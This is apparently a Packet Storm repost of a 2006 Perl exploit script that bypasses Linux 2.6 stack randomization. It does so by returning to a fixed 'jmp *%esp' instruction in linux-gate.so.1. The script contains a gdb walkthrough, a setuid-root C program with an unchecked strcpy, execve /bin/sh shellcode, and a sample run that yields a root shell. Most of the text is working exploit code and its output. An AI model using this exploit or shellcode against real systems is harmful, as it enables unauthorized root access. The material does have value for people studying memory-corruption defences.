Exploit solution against Linux kernel 2.6 stack randomization using the jmp *%esp technique.
50a882d748cd436140df3f15901fee6e21f635b7cf433b54fac79e42d350c913#!/usr/bin/perl -w
use strict;
#
# [exp_jmp_rand.pl] Mon Apr 3 19:17:14 CEST 2006
#
# Exploit solution against 2.6 stack randomization
# Using the "jmp *%esp" technic.
#
# Copyright: bunker - https://rawlab.altervista.org
# 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
#
#
# EXPLANATION: In 2.6 kernel we have a ghost library named
# "linux-gate.so.1". It's a virtual DSO, a shared
# object exposed by the kernel at a fixed address
# in every process' memory. This part of memory
# isn't randomized, so we can explore it to find
# useful "call" or "jmp" instructions!
# In this example we find "jmp *%esp" in memory
# so we can execute shellcode in the stack ;-)
#
#
# [Find "jmp *%esp" in memory]
#
# bunker@syn:~/vuln$ ldd vuln_prog
# linux-gate.so.1 => (0xffffe000) <--- NOT RANDOM
# libc.so.6 => /lib/tls/libc.so.6 (0xb7e84000)
# /lib/ld-linux.so.2 (0xb7fcd000)
#
# bunker@syn:~/vuln$ gdb vuln_prog
# (gdb) break main
# Breakpoint 1 at 0x80483ad
# (gdb) run
# Starting program: /home/bunker/vuln/vuln_prog
# Breakpoint 1, 0x080483ad in main ()
# (gdb) x/i 0xffffe000
# 0xffffe000: jg 0xffffe047
# (gdb)
# 0xffffe002: dec %esp
# (gdb)
# 0xffffe003: inc %esi
# ...
# (gdb)
# 0xffffe777: jmp *%esp <- Interesting, use this!!
#
# bunker@syn:~/vuln$ cat vuln_prog.c
# int main(int argc, char **argv) {
# char buf[256];
# strcpy(buf, argv[1]);
# }
#
# bunker@syn:~/vuln$ ls -al vuln_prog
# -rwsr-sr-x 1 root users 8340 2006-04-02 20:11 vuln_prog
#
# bunker@syn:~/vuln$ perl exp_jmp_rand.pl 68
# sh-3.1# id
# uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)
die "Usage: $0 <num>\n [ vuln_buf < 4byte_ret * num ]\n"
if ($#ARGV != 0);
my $num = $ARGV[0];
print "Using multiplication factor $num...\n";
# jmp *%esp
my $ret = 0xffffe777;
# shellcode
my $sc = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58".
"\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e".
"\x89\xe3\x52\x53\x89\xe1\xcd\x80";
# vulnerable file
my $vuln = "./vuln_prog";
# build buffer
my $buf = pack("L",$ret)x$num . $sc;
# boom! :-D
exec $vuln, $buf;
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed